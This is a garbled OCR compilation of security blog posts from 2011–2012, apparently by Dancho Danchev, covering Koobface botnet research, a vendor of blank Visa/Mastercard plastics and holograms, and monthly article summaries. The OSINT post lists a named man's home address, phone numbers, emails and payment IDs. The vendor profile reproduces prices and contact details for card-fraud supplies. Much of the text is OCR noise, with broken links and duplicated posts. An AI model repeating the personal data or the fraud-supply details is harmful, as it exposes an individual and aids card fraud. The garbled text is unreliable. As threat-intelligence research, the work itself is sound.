[31]Movement on the Koobface Front 

[32]Dissecting the Koobface Worm’s December Campaign 

[33]The Koobface Gang Mixing Social Engineering Vectors 


[34]Dissecting the Latest Koobface Facebook Campaign 


ttps://www.google.com/#sclient=psy-abkhl=en&site=kxsource=hpkq=site :ddanchev. blogspot .comt+koobface&pbx=1ko 


=site:ddanchev. blogspot .com+koobfacekag=fkaqi=kaql=kg 


2. http://ddanchev.blogspot .com/2009/07/koobface-come-out-come-out-wherever-you.htm 
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ttp://wepawet .iseclab. org/view. php?hash=04ae15b96e1a3e56078e3e8c2f b2e3bd&t=1247871568ktype=js 


5. http: //waw.kupia.ru/board/bmw/3_seriya/7861 
6. http: //twitter .com/krotreal 
7. http: //twitter. com/Real_Koobface 
8. http: //www. flickr. com/photos/krotreal/ 
9. http: //vkontakte.ru/krotreal 
. http: //vkontakte.ru/tonystarx 
11. https://foursquare.com/krotrea 


12. http: //www.icghackers.ru/viewlog/24.12.200 


13. http: //ddanchev.blogspot .com/2009/01/squeezing-cybecrime-ecosystem-in- 2009. htm 


14. http: //ddanchev. blogspot .com/2010/03/koobface-redirectors-and-scareware.htm 


15. http: //ddanchev.blogspot.com/2009/12/koobface-gang-wishes-industry-happy.htm 
16. http: //ddanchev. blogspot . com/2010/05/koobface- gang-responds-to-10-things-you.htm 
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. http: //www.zdnet.com/blog/security/10-things-you-didnt-know-about-the-koobface-gang/5452 


http: //ddanchev . blogspot . com/2009/12/koobface-friendly-riccom-1td-as29550 .html 
26. jeep: //ddanchev blogspot .com/2000/07 dissect ing-kocbtace-vorns~tustter tal 


18. http: //ddanchev.blogspot .com/2010/02/how-koobface-gang-monet izes-mac-os-x.htm 
19. http: //ddanchev.blogspot .com/2009/11/koobface-botnets-scareware-business.htm 
20. http: //ddanchev. blogspot . com/2009/09/koobface-botnets-scareware-business.htm 
21. http: //ddanchev. blogspot .com/2010/05/from-koobface-gang-with-scareware.htm 
22. http://ddanchev. blogspot .com/2009/11/koobface-botnet-starts-serving-client.htm 
23. http://ddanchev. blogspot .com/2009/12/koobface-friendly-riccom-1td-as29550. htm 
24. http://ddanchev. blogspot .com/2010/04/dissecting-koobface-gangs-latest .htm 
25. http: //ddanchev. blogspot . com/2009/07/dissecting-koobface-worms-twitter .htm 

. http: //ddanchev. blogspot .com/2009/07/dissecting-koobface-worms-twitter.htm 
27. http://ddanchev. blogspot .com/2009/10/koobface-botnet-redirects-facebooks-ip.htm 
28. http: //ddanchev. blogspot .com/2009/10/koobface-botnet-dissected-in-trendmicro.htm 
29. http: //ddanchev. blogspot . com/2009/11/massive-scareware-serving-blackhat-seo.htm 
30. http: //ddanchev. blogspot .com/2009/08/movement- on-koobface-front-part-two.htm 
31. http: //ddanchev. blogspot .com/2009/08/movement-on-koobface-front .htm 
32. http: //ddanchev. blogspot . com/2008/12/dissecting-koobface-worms-december .htm 


. http: //ddanchev. blogspot. com/2008/12/koobface- gang-mixing-social-engineering.htm 


34. http: //ddanchev. blogspot . com/2008/11/dissecting-latest-koobface-facebook.htm 
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7.11 December 


7.11.1 Summarizing ZDNet’s Zero Day Posts for October (2011-12-04 21:05) 


fe tee ew Mery Seekers bok ee TT 


ied aa 6 i ~& 


Elash Player dirty dozen: Adobe plugs 
od: 


» code execution holes 


The following is a brief summary of all of my posts at ZDNet’s Zero Day for October. You can 
subscribe to my [1]personal RSS feed, [2]Zero Day’s main feed, or follow me on Twitter: 


x 


01. [3]iPhone 5 themed emails serve Windows malware 
02. [4]27 of 100 tested Chrome extensions contain 51 vulnerabilities 
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03. [5]37 percent of users browsing the Web with insecure Java versions 

04. [6]Google introduces Safe Browsing Alerts for network administrators 

05. [7]Malware Watch: U.S Chamber of Commerce official letter; DHL delivery error, IRS 
notifications 

06. [8]’Steve Jobs Alive!’ emails lead to exploits and malware 

07. [9]Which is the most popular malware propagation tactic? 

08. [10]Spamvertised ’Cancellation of the package delivery’ emails serving malware 
09. [11]Hacking group from Nepal posts 10,000 stolen Facebook accounts online 

10. [12]Over a million web sites affected in mass SQL injection attack 

11. [13]New Mac OS X malware disables Apple’s malware protection 

12. [14]New Mac OS X malware with DDoS functionality spotted in the wild 

13. [15]Security researcher finds major security flaw in Facebook 


This post has been reproduced from [16]Dancho Danchev’s blog. Follow him 
[17]on Twitter. 


1. http: //www.zdnet .com/topics/danchot+danchev?o=1kmode=rss&tag=mantle_skin; content 
2. ttp://feeds. feedburner con/zénet/ security 
ttp://www.zdnet .com/blog/security/iphone-5-themed-emails-serve-windows-malware/9534 
. http: //www.zdnet .com/blog/security/27-of-100-tested-chrome-extensions-contain-51-vulnerabilities/953 
.zdnet .com/blog/security/37-percent-of-users-browsing-the-web-with-insecure-java-versions/9541 
.zdnet .com/blog/security/google-introduces-safe-browsing-alerts-for-network-administrators/9569 


zdnet .com/blog/security/malware-watch-us-chamber-of-commerce-official-letter-dhl-delivery-erro 


com/blog/security/over-a-million-web-sites-affected-in-mass-sql-injection-attack/9662 


com/blog/security/new-mac- os-x-malware-disables-apples-malware-protection/966 


com/blog/security/new-mac- os-x-malware-with-ddos-functionality-spotted-in-the-wild/9701 


. http: //www.zdnet .com/blog/security/security-researcher-finds-major-security-flaw-in-facebook/9704 


16. http://ddanchev.blogspot.com/ 
17. http://twitter.com/danchodanche 
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2012 


8.1 January 


8.1.1 Summarizing ZDNet’s Zero Day Posts for November (2012-01-01 20:59) 


Amnesty Internatsonal UK cor 
serving exploits and reabware 


_  Cybereniminals hijeck Facebook accounts 


through bogus browser extenssons 


hed ransomware variants impersonate 
Tt ageoaes 


expbotting the death of Kir 


ketation huts updated mth 
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The following is a brief summary of all of my posts at ZDNet’s Zero Day for November. You 
can subscribe to my [1]personal RSS feed , [2]Zero Day’s main feed , or follow me on Twitter: 


01. [3]Massive DNS poisoning attack in Brazil serving exploits and malware 
02. [4]South Korea to block port 25 as anti-spam countermeasure 

03. [5]Researchers spot malware using a stolen government certificate 

04. [6]SCADA systems at the Water utilities in Illinois, Houston, hacked 

05. [7]New Facebook worm spreading 

06. [8]Popular free antivirus apps for Android fail anti-malware tests 


This post has been reproduced from [9]Dancho Danchev’s blog. Follow him [10]Jon 
Twitter. 


ttp://www.zdnet .com/topics/danchotdanchev?o=1kmode=rss&tag=mantle_skin; content 


1. 
2. http://feeds.feedburner.com/zdnet/securit 


3. http://www.zdnet.com/blog/security/massive-dns-poisoning-attack- in-brazil-serving-exploits-and-malware/9 


ttp://www.zdnet .com/blog/security/south-korea-to-block-port- 25-as- ant i-spam-countermeasure/9789 


ttp://www.zdnet.com/blog/security/researchers-spot-malware-using-a-stolen-government-certificate/981 


. http://www. zdnet .com/blog/security/new-facebook-worm-spreading/982 


. http: //www.zdnet .com/blog/security/popular-free-antivirus-apps-for-android-fail-anti-malware-tests/9830 
. http: //ddanchev.blogspot.com/ 
10. http://twitter .com/danchodanche 


4 
5 
6. http: //www.zdnet .com/blog/security/scada-systems-at-the-water-utilities-in-illinois-houston-hacked/9821 
7 
8 
9 
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8.1.2 Summarizing ZDNet’s Zero Day Posts for December (2012-01-01 21:02) 


“IT need to eliminat reats while they're 
a giearn in a hacker's eye” 


The following is a brief summary of all of my posts at ZDNet’s Zero Day for December. You 
can subscribe to my [1]personal RSS feed , [2]Zero Day’s main feed , or follow me on Twitter: 


x 


01. [3]New study claims that Chrome is the most secure browser 
02. [4]FTC issues refunds to scareware victims 

03. [5]Yahoo! Mail introduces two factor authentication 

04. [6]Web malware exploitation kits updated with new Java exploit 
05. [7]Cybercriminals exploiting the death of Kim Jong-Il 
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06. [8]Localized ransomware variants impersonate law enforcement agencies 
07. [9]Cybercriminals hijack Facebook accounts through bogus browser extensions 
08. [10]Amnesty International UK compromised, serving exploits and malware 


This post has been reproduced from [11]Dancho Danchev’s blog. Follow him [12]Jon 
Twitter. 


11. http://ddanchev. blogspot .com/ 
12. http://twitter.com/danchodanche 


8.1.3 Profiling a Vendor of Visa/Mastercard Plastics and Holograms (2012-01-03 20:04) 


What is it that cybercriminals needs once they have obtained access to [1]stolen financial 
data? Next to [2]money mules, that’s empty plastic cards in which they will later on embed 
the stolen financial data. 


Let’s profile a vendor of empty Visa/Mastercard plastic cards and holograms in order to 
gain a better picture at just how easy it is to obtain such plastic cards. 


Associated nickname: pizzA 
Associated ICQ: 496-872-531 
Associated email: plastics@safe-mail.net 


Translated vendor’s proposition: 
Below you have prices and samples of my products. 


Plastics - Blanks: 
1-50 = 15each 
51-100 = 14 each 
101+ = 13 each 
201+ = 12 each 


Plastics - Embossed 
1 and up = 20each 
101+ = 18each 
201+ = 17each 
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Minimum order: 200USD 
Shipping to: USA, International orders(min $800 + shipping) 
Plastics have UV Security print on Front and Back. 


Holograms Stickers and Heatpress: 
VISA - Silver/Gold 

VISA mini - Silver/Gold 

MasterCard - Silver/Gold 

Minimum order on stickers: 500pcs 
Minimum order on Heatpress: 1000pcs 


$0.8 per hologram 


PAYMENT: 
Liberty Reserve (Prefered) 
Western Union (500usd minimum + 8 % WU fee) 


RULES: 

- Any order, question feel free to ask in ICQ. 

- Shipping time 24-48 after the money is picked up. 

- PLEASE USE THIS TOPIC ONLY FOR FEEDBACK, ANY QUESTION AND ORDERS in ICQ. 
- If you buy from me it means you agreed my rules. 


Screenshots of his inventory of Visa and Mastercard plastics and holograms: 
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Barclays 1 


ar 


Chase 1 
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Citi 3 


F224 


HSBC <> 
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Wells 2 


196872531 pizza icq# 496872531 pizza icq# « 


pizza icq# 496872531 pizza icq# 496872531 


196872531 pizza icq# 496872531 pizza icg# « 


pizza icq# 496872531 pizza icq# 496872531 


3887 


3888 


3889 


CHASE © 


3890 


3891 


NOT VALID UNLESS SIGNED 
For customer sence | 288 GUSINESS 


‘Thws card is the property of he sswer and has been asued to Cinbank 
Ths card may Be revoked witout amy sotice and must be surTeNdered Upon demand 


Ffound please Send Pes Card cut m two 
eces to C® Cards FO Gor 6408 Sioux Fails SD STITT 


3892 


Sit 


PLATINUM SELECT 


3893 


M2sl t rt aiu 


24 tour Customer Serwce +63 2 956-9979 es 


SIGNATURE 


AUTHORIZED TM ESE 
Wn boy 


oe y 
NOT VALID UNLESS 


Thes card 6 issued by CitiBark AA (Bank) 
MasterCard Thws card :s property 


found send to G/F Cttpank Center 
447 Paseo de Roxas Makati City, 1200 Psipgnes 
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This Card is issued by and proprty of HSBC. USA under license of Visa 


cas Caml ne. Use of Gin Card constitutes acceptance on the Terms 
and Conditions governung the amended 
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HSBC #4 


The world’s 


MM our Customer Serwee +6) 2 $76-8000 


NOT VALID UNLESS SIGNED 


Thws card 6 issued by SBC Prwkpgenes A A ("Bank") pursuart to all boense 
fom Visa internabora! Thes cards property of Bank and must be retunec 


“pon request 


"found send io SY HSBC Centre 3058 Fifth Avenue West 


HSBC4&x>  Friss 


GEMAL TOSGE 20065080 2R SA408 
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3897 


First Class 


VISA INFINITE 


Not Vabe Uniess Sqnec 


Rd 


Your card is issued and serviced by TD Sank. pursuant to 
@ license from Visa incorporated Its use is a subject to the 
terms of your Cardmember Agreement 


P/% 
‘PLUS 
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3899 


Visa 
payWave »)) 


Ths Sap aterantty SS Cantatas 


3900 


MOT VLD UM £88 SIGNED 
Ns ome = weed Dy MRE Piggers A A (Bare 
toe Wee Pternabona "les cards property of Baré and 
~—T eQuew 


° Sum sew te GT HSBC Centre 2058 Filth Averwe West 


HSBC 43> 


GEMALTO 
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This post has been reproduced from [3]Dancho Danchev’s blog. Follow him [4Jon 
Twitter. 


1. http: //ddanchev. blogspot .com/2011/10/exposing-market-for-stolen-credit-cards.html 

2. https: //www.google.com/#sclient=psy-abkhl=en&site=ksource=hp&q=site : ddanchev. blogspot. com+money+mules&pbx= 
1koq=site:ddanchev.blogspot .com+moneyt+muleskaq=fkaqi=& 

3. http: //ddanchev. blogspot .com/ 

4. http://twitter.com/danchodanchev 


8.1.4 Profiling a Vendor of Visa/Mastercard Plastics and Holograms (2012-01-03 20:04) 


What is it that cybercriminals needs once they have obtained access to [1]stolen financial 
data? Next to [2]money mules, that’s empty plastic cards in which they will later on embed 
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the stolen financial data. 


Let’s profile a vendor of empty Visa/Mastercard plastic cards and holograms in order to 


gain a better picture at just how easy it is to obtain such plastic cards. 


Associated nickname: pizzA 
Associated ICQ: 496-872-531 


Associated email: plastics@safe-mail.net 


Translated vendor’s proposition: 


Below you have prices and samples of my products. 


Plastics - Blanks: 
1-50 = 15each 
51-100 = 14 each 
101+ = 13 each 


201+ = 12 each 


Plastics - Embossed 
1 and up = 20each 
101+ = 18each 


201+ = 17each 


Minimum order: 20O0OUSD 
Shipping to: USA, International orders(min $800 + shipping) 


Plastics have UV Security print on Front and Back. 
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Holograms Stickers and Heatpress: 
VISA - Silver/Gold 

VISA mini - Silver/Gold 

MasterCard - Silver/Gold 

Minimum order on stickers: 500pcs 


Minimum order on Heatpress: 1000pcs 


$0.8 per hologram 


PAYMENT: 
Liberty Reserve (Prefered) 


Western Union (500usd minimum + 8 % WU fee) 


RULES: 

- Any order, question feel free to ask in ICQ. 

- Shipping time 24-48 after the money is picked up. 

- PLEASE USE THIS TOPIC ONLY FOR FEEDBACK, ANY QUESTION AND ORDERS in ICQ. 


- If you buy from me it means you agreed my rules. 


Screenshots of his inventory of Visa and Mastercard plastics and holograms: 
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Barclays 1 


ar 


Chase 1 
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Citi 3 


F224 


HSBC <> 


3906 


Wells 2 


196872531 pizza icq# 496872531 pizza icq# « 


pizza icq# 496872531 pizza icq# 496872531 


196872531 pizza icq# 496872531 pizza icg# « 


pizza icq# 496872531 pizza icq# 496872531 
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3908 


3909 


CHASE © 


3910 


3911 


NOT VALID UNLESS SIGNED 
For customer sence | 288 GUSINESS 


‘Thws card is the property of he sswer and has been asued to Cinbank 
Ths card may Be revoked witout amy sotice and must be surTeNdered Upon demand 


Ffound please Send Pes Card cut m two 
eces to C® Cards FO Gor 6408 Sioux Fails SD STITT 
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Sit 


PLATINUM SELECT 
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M2sl t rt aiu 


24 tour Customer Serwce +63 2 956-9979 es 


SIGNATURE 


AUTHORIZED TM ESE 
Wn boy 


A/F, 
NOT VALID UNLESS 


Thes card 6 issued by CitiBark AA (Bank) 
MasterCard Thws card :s property 


found send to G/F Cttpank Center 
447 Paseo de Roxas Makati City, 1200 Psipgnes 
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This Card is issued by and proprty of HSBC. USA under license of Visa 


cas Caml ne. Use of Gin Card constitutes acceptance on the Terms 
and Conditions governung the amended 
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HSBC #4 


The world’s 


MM our Customer Serwee +6) 2 $76-8000 


NOT VALID UNLESS SIGNED 


Thws card 6 issued by SBC Prwkpgenes A A ("Bank") pursuart to all boense 
fom Visa internabora! Thes cards property of Bank and must be retunec 


“pon request 


"found send io SY HSBC Centre 3058 Fifth Avenue West 


HSBC4&x>  Friss 


GEMAL TOSGE 20065080 2R SA408 
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3917 


First Class 


VISA INFINITE 


Not Vabe Uniess Sqnec 


Rd 


Your card is issued and serviced by TD Sank. pursuant to 
@ license from Visa incorporated Its use is a subject to the 
terms of your Cardmember Agreement 


P/% 
‘PLUS 
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Visa 
payWave »)) 


Ths Sap aterantty SS Cantatas 
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This post has been reproduced from [3]Dancho Danchev’s blog. Follow him [4]on Twitter. 


1. http: //ddanchev. blogspot .com/2011/10/exposing-market-for-stolen-credit-cards.html 

2. https: //www.google.com/#sclient=psy-abkhl=en&site=ksource=hp&q=site : ddanchev. blogspot. com+money+mules&pbx= 
1koq=site:ddanchev.blogspot .com+moneyt+muleskaq=fkaqi=k 

3. http: //ddanchev. blogspot .com/ 

4. http://twitter.com/danchodanchev 
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8.1.5 Who’s Behind the Koobface Botnet? - An OSINT Analysis (2012-01-09 16:59) 


It’s full disclosure time. 


In this post, | will perform an OSINT analysis, exposing one of the key botnet masters 
behind the infamous Koobface botnet, that | have been [1]extensively profiling and infiltrat- 
ing since day one. | will include photos of the botnet master, his telephone numbers, multiple 
email addresses, license plate for a BMW, and directly connect him with the infrastructure - 
now offline or migrated to a different place - of Koobface 1.0. 


The analysis is based on a single mistake that the botnet master made - namely using 
his personal email for registering a domain parked within Koobface’s command and control 
infrastructure, that at a particular moment in time was directly redirecting to the ubiquitous 
fake Youtube page pushed by the Koobface botnet. 


Let’s start from the basics. Here’s an excerpt from a [2]previous research conducted on 
the Koobface botnet: 


* -d-cgpay-090709.com 
supermerd.org 


upr0306.com 78.110,160.0/20 ——“S-me as42831 


www.r-d-cgpay-090709.com 


Zaebalinax.com 


However, what the Koobface gang did was to register a new domain and use it as Koob- 
face C &C again parked at the same IP, which remains active - zaebalinax.com Email: 
krotreal@gmail.com - 78.110.175.15 - in particular zaebalinax.com/the/?pid=14010 
which is [3]Jredirecting to the Koobface botnet. Two more domains were also regis- 
tered and parked there, u15jul .com and umidsummer .com - Email: 2009polevan- 
drey@mail.ru which remain in stand by mode at least for the time being. 


The Koobface botnet master’s biggest mistake is using the Koobface infrastructure for 
hosting a domain that was registered with the botnet master’s personal email address. In this 
case that zaebalinax.com and krotreal@gmail.com. zaebalinax.com is literally translated 
to "Gave up on Linux". UPDATED: Multiple readers have to contacted me to point out that 
zaebalinax is actually translated to "f*ck you all" or "you all are p*ssing me off". 


The same email krotreal@gmail.com was used to [4]ladvertise the sale of Egyptian 
Sphynx kittens on 05.09.2007: 
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krotreal@gmail.com 


The following telephone belonging to Anton was provided - +79219910190. The interesting 
part is that the same telephone was also used in [5Janother advertisement, this time for the 
sale of a BMW: 


Capetomeadt er annen 


AgT0 8 MRtArRMOM Coctomeam Lonee 


MomDotocke umeGo AO PeMe Gorey 
Moca 
Autom 


me: +7921991019000 


Photos of the BMW, offered for sale, by the same Anton that was using the Koobface infras- 
tructure to host zaebalinax.com Email: krotreal@gmail.com: 
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License plane for Anton’s newest BMW: 
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Upon further analysis, it becomes evident that his real name is Anton Nikolaevich Korotchenko 
(AHTOH HukonaeBuy KopoTyueHko). Here are more details of this online activities: 


Real name: Anton Nikolaevich Korotchenko (AHTOH HukonaeBuy KopoTtyeHko) 
City of origin: St. Petersburg 

Primary address: Omskaya st. 26-61; St. Petersburg; Leningradskaya oblast,197343 
Associated phone numbers obtained through OSINT analysis, not whois records: 
+79219910190 

+380505450601 

050-545-06-01 

ICQ - 444374 

Emails: krotreal@yahoo.com 

krotreal@gmail.com 

krotreal@mail.ru 

krotreal@livejournal.com 

newfider@rambler.ru 

WM identification (WEB MONEY) : 425099205053 

Twitter account: [6]@KrotReal; [7]@Real Koobface 

Flickr account: [8]KrotReal 

Vkontakte.ru Account: [9]KrotReal; [10]tonystarx 

Foursquare Account: [11]KrotReal 


Photos of Koobface botnet’s master Anton Nikolaevich Korotchenko (AHTOH HuKkonaeBuny 
KOpoTyeHko): 
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Also, [12]a chat log from 2003, identifies KrotReal while he’s using the following IP - 
krotreal@ip-534.dialup.cl.spb.ru 


[13]How do you trigger a change that would ultimately affect the entire cybercrime 
ecosystem? By personalizing cybercrime. 


Go through previous research conducted on the Koobface botnet: 
[14]Koobface Redirectors and Scareware Campaigns Now Hosted in Moldova 
[15]The Koobface Gang Wishes the Industry "Happy Holidays" 
[16]Koobface Gang Responds to the "10 Things You Didn’t Know About the Koobface Gang 
Post" 

[17]10 things you didn’t know about the Koobface gang 

[18]How the Koobface Gang Monetizes Mac OS X Traffic 

[19]Koobface Botnet’s Scareware Business Model - Part Two 
[20]Koobface Botnet’s Scareware Business Model 

[21]From the Koobface Gang with Scareware Serving Compromised Site 
[22]Koobface Botnet Starts Serving Client-Side Exploits 
[23]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 
[24]Dissecting Koobface Gang’s Latest Facebook Spreading Campaign 
[25]Koobface - Come Out, Come Out, Wherever You Are 

[26]Dissecting Koobface Worm’s Twitter Campaign 

[27]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[28]Koobface Botnet Dissected in a TrendMicro Report 

[29]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[30]Movement on the Koobface Front - Part Two 

[31]Movement on the Koobface Front 

[32]Dissecting the Koobface Worm’s December Campaign 
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[33]The Koobface Gang Mixing Social Engineering Vectors 
[34]Dissecting the Latest Koobface Facebook Campaign 


This post has been reproduced from [35]Dancho Danchev’s blog. Follow him 
[36]Jon Twitter. 


. https://www.google.com/#sclient=psy-abkhl=enksite=k%source=hp&q=site: ddanchev. blogspot . com+koobface&pbx=1ko 


q=site:ddanchev.blogspot.comtkoobfacekag=fkaqi=kaql=kg 


2. http: //ddanchev. blogspot .com/2009/07/koobface-come-out-come-out-wherever-you.htm 


ttp://wepawet .iseclab. org/view. php?hash=04ae15b96e1a3e56078e3e8c2f b2e3bd&t=1247871568ktype=js 


http: //translate.google.com/translate?hl=en&sl=rugu=http: //www.britancat .ru/brd/ index .php/3Fp/3Dshop/26st 


art/3D10&ei=2BkGTOmNHYXX0QGomciZAgksa=Xkoi=translatekct 
5. http: //waw.kupia.ru/board/bmw/3_seriya/7861 

6, http: //twiteer .con/krotreal 

7. http: //twitter. com/Real_Koobface 

8. : .flickr. / 

9, http: //vkontakte.ru/krotreal 
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13. http: //ddanchev.blogspot .com/2009/01/squeezing-cybecrime-ecosystem-in- 2009. htm 
14. http: //ddanchev .blogspot .com/2010/03/koobface-redirectors-and-scareware.htm 
15. http: //ddanchev.blogspot.com/2009/12/koobface-gang-wishes-industry-happy.htm 


16. http: //ddanchev.blogspot .com/2010/05/koobface- gang-responds-to-10-things-you.htm 


. http: //www.zdnet.com/blog/security/10-things-you-didnt-know-about-the-koobface-gang/5452 
18. http: //ddanchev.blogspot .com/2010/02/how 
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. http: //ddanchev. blogspot. com/2008/12/koobface- gang-mixing-social-engineering.htm 


. http: //ddanchev. blogspot . com/2008/11/dissecting-latest-koobface-facebook. htm 
35. http://ddanchev.blogspot.com/ 
36. http://twitter.com/danchodanche 
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8.1.6 Who’s Behind the Koobface Botnet? - An OSINT Analysis (2012-01-09 16:59) 


In this post, | will perform an OSINT analysis, exposing one of the key botnet masters behind 
the infamous Koobface botnet, that | have been [1]extensively profiling and infiltrating since 
day one. | will include photos of the botnet master, his telephone numbers, multiple email 
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addresses, license plate for a BMW, and directly connect him with the infrastructure - now 
offline or migrated to a different place - of Koobface 1.0. 


The analysis is based on a single mistake that the botnet master made - namely using 
his personal email for registering a domain parked within Koobface’s command and control 
infrastructure, that at a particular moment in time was directly redirecting to the ubiquitous 
fake Youtube page pushed by the Koobface botnet. 


Let’s start from the basics. Here’s an excerpt from a [2]previous research conducted on 
the Koobface botnet: 


* -d-cgpay-090709.com 
supemerd.org 


upr0306.com 78.110,160.0/20 ——“2-ge as42831 


www.r-d-cgpay-090709.com 


zaebalinax.com 


However, what the Koobface gang did was to register a new domain and use it as Koob- 
face C &C again parked at the same IP, which remains active - zaebalinax.com Email: 
krotreal@gmail.com - 78.110.175.15 - in particular zaebalinax.com/the/?pid=14010 
which is [3]Jredirecting to the Koobface botnet. Two more domains were also regis- 
tered and parked there, u15jul .com and umidsummer .com - Email: 2009polevan- 
drey@mail.ru which remain in stand by mode at least for the time being. 


The Koobface botnet master’s biggest mistake is using the Koobface infrastructure for 
hosting a domain that was registered with the botnet master’s personal email address. In this 
case that zaebalinax.com and krotreal@gmail.com. zaebalinax.com is literally translated 
to "Gave up on Linux". UPDATED: Multiple readers have to contacted me to point out that 
zaebalinax is actually translated to "f*ck you all" or "you all are p*ssing me off". 
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The same email krotreal@gmail.com was used to [4ladvertise the sale of Egyptian 
Sphynx kittens on 05.09.2007: 


krotreal@gmail.com 


The following telephone belonging to Anton was provided - +79219910190. The interest- 
ing part is that the same telephone was also used in [5Janother advertisement, this time for 
the sale of a BMW: 


Copetomaut werarnes 


Ag70 8 RAParmMOU CocTomam bones 
Nompetet umgo to teNEgomy 


Mocena 


Atom 


me: 4792199101900 
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Photos of the BMW, offered for sale, by the same Anton that was using the Koobface in- 
frastructure to host zaebalinax.com Email: krotreal@gmail.com: 


21.3.2008 


Ce QULO.TU 
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Upon further analysis, it becomes evident that his real name is Anton Nikolaevich Ko- 
rotchenko (AHTOH HukonaeBuy KopotueHko). Here are more details of this online activities: 


Real name: Anton Nikolaevich Korotchenko (AHTOH HukonaesBuy KopoT4ueHKo) 
City of origin: St. Petersburg 

Primary address: Omskaya st. 26-61; St. Petersburg; Leningradskaya oblast,197343 
Associated phone numbers obtained through OSINT analysis, not whois records: 
+79219910190 

+380505450601 

050-545-06-01 

ICQ - 444374 

Emails: krotreal@yahoo.com 

krotreal@gmail.com 

krotreal@mail.ru 

krotreal@livejournal.com 

newfider@rambler.ru 

WM identification (WEB MONEY) : 425099205053 

Twitter account: [6]@KrotReal; [7]@Real Koobface 

Flickr account: [8]KrotReal 

Vkontakte.ru Account: [9]KrotReal; [10]tonystarx 


Foursquare Account: [11]KrotReal 


Also, [12]a chat log from 2003, identifies KrotReal while he’s using the following IP - 
krotreal@ip-534.dialup.cl.spb.ru 


[13]How do you trigger a change that would ultimately affect the entire cybercrime 
ecosystem? By personalizing cybercrime. 
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Go through previous research conducted on the Koobface botnet: 
[14]Koobface Redirectors and Scareware Campaigns Now Hosted in Moldova 
[15]The Koobface Gang Wishes the Industry "Happy Holidays" 
[16]Koobface Gang Responds to the "10 Things You Didn’t Know About the Koobface Gang Post" 
[17]10 things you didn’t know about the Koobface gang 

[18]How the Koobface Gang Monetizes Mac OS X Traffic 

[19]Koobface Botnet’s Scareware Business Model - Part Two 
[20]Koobface Botnet’s Scareware Business Model 

[21]From the Koobface Gang with Scareware Serving Compromised Site 
[22]Koobface Botnet Starts Serving Client-Side Exploits 
[23]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 
[24]Dissecting Koobface Gang’s Latest Facebook Spreading Campaign 
[25]Koobface - Come Out, Come Out, Wherever You Are 

[26]Dissecting Koobface Worm’s Twitter Campaign 

[27]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[28]Koobface Botnet Dissected in a TrendMicro Report 

[29]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[30]Movement on the Koobface Front - Part Two 

[31]Movement on the Koobface Front 

[32]Dissecting the Koobface Worm’s December Campaign 

[33]The Koobface Gang Mixing Social Engineering Vectors 


[34]Dissecting the Latest Koobface Facebook Campaign 


ttps://www.google.com/#sclient=psy-abkhl=en&site=kxsource=hpkq=site :ddanchev. blogspot .comt+koobface&pbx=1ko 


=site:ddanchev. blogspot .com+koobfacekag=fkaqi=kaql=kg 
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3967 


ttp://wepawet .iseclab. org/view. php?hash=04ae15b96e1a3e56078e3e8c2f b2e3bd&t=1247871568ktype=js 


5. http: //waw.kupia.ru/board/bmw/3_seriya/7861 
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8.2 February 


8.2.1 Summarizing ZDNet’s Zero Day Posts for January (2012-02-02 00:59) 


ee ery eee ee oe 


The following is a brief summary of all of my posts at ZDNet’s Zero Day for January, 2012. You 
can subscribe to my [1]personal RSS feed , [2]Zero Day’s main feed , or follow me on Twitter: 


x 


01. [3]’Most beautiful’ scams proliferate on Facebook 

02. [4]Android users hit by scareware scam 

03. [5]’Remove Facebook Timeline’ themed scam circulating on Facebook 
04. [6]Fake Kim Jong-il video distributing malware 
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05. [7]Researchers spot pharmaceutical soam campaign using QR Codes 

06. [8]Report: Conficker and AutoRun infections proliferating 

07. [9]Researchers spot scammers using fake browser plug-ins 

08. [10]New variants of premium rate SMS trojan ’RuFraud’ detected in the wild 
09. [11]Research: Spammers actively harvesting emails from Twitter in real-time 
10. [12]DreamHost hacked, mass password-reset issued 


This post has been reproduced from [13]Dancho Danchev’s blog. Follow him 
[14]on Twitter. 


1. http: //www.zdnet .com/topics/danchot+danchev?o=1&mode=rss&tag=mantle_skin; content 
2. http: //feeds. feedburner . com/zdnet/security 
://www.zdnet .com/blog/security/most-beautiful-scams-proliferate-on-facebook/9954 
.com/blog/security/android-users-hit-by-scareware-scam/9960 
zdnet .com/blog/security/remove-facebook-timeline-themed-scam-circulating-on-facebook/9989 
zdnet .com/blog/security/fake-kim- jong-il-video-distributing-malware/9992 


zdnet .com/blog/security/researchers- spot-pharmaceutical-spam-campaign-using-qr-codes/1002 


zdnet .com/blog/security/report-conficker-and-autorun- infections-proliferating/10030 


.com/blog/security/researchers- spot-scammers-using-fake-browser-plug-ins/10160 


12. 
13. 
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8.2.2 Summarizing Webroot’s Threat Blog Posts for January (2012-02-02 01:07) 
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The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for January, 
2012. You can subscribe to my [2]Webroot’s Threat Blog RSS Feed 


or follow me on Twitter: 


x 


01. [3]Millions of harvested emails offered for sale 

02. [4]Email hacking for hire going mainstream 

03. [5]Mass SQL injection attack affects over 200,000 URLs 
04. [6]A peek inside the PickPocket Botnet 
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05. [7]A peek inside the Cythosia v2 DDoS Bot 

06. [8]Google announces new anti-malware features in Chrome 

07. [9]Adobe issues a patch for critical security holes in Reader and Acrobat 
08. [10]Inside a clickjacking/likejacking scam distribution platform for Facebook 
09.[11] Zappos.com hacked, 24 million users affected 

10. [12]Inside AnonJDB - a Java based malware distribution platforms for drive-by downloads 
11. [13]How malware authors evade antivirus detection 

12. [14]A peek inside the Umbra malware loader 

13. [15]How phishers launch phishing attacks 

14. [16]Researchers intercept a client-side exploits serving malware campaign 
15. [17]A peek inside the uBot malware bot 

16. [18]Cisco releases ‘Cisco Global Threat Report’ for 4Q11 

17. [19]Cybercriminals generate malicious Java applets using DIY tools 


This post has been reproduced from [20]Dancho Danchev’s blog. Follow him 
[21]on Twitter. 


. http://blog.webroot.com/ 
. http: //feeds2.feedburner .com/WebrootThreatBlog 


ttp://blog.webroot .com/2012/01/03/millions-of-harvested-emails-offered-for-sale/ 
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ttp://blog.webroot .com/2012/01/05/mass-sql-injection-attack-affects-over-200000-urls/ 


. http: //blog.webroot .com/2012/01/06/a-peek-inside-the-pickpocket-botnet/ 
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6 
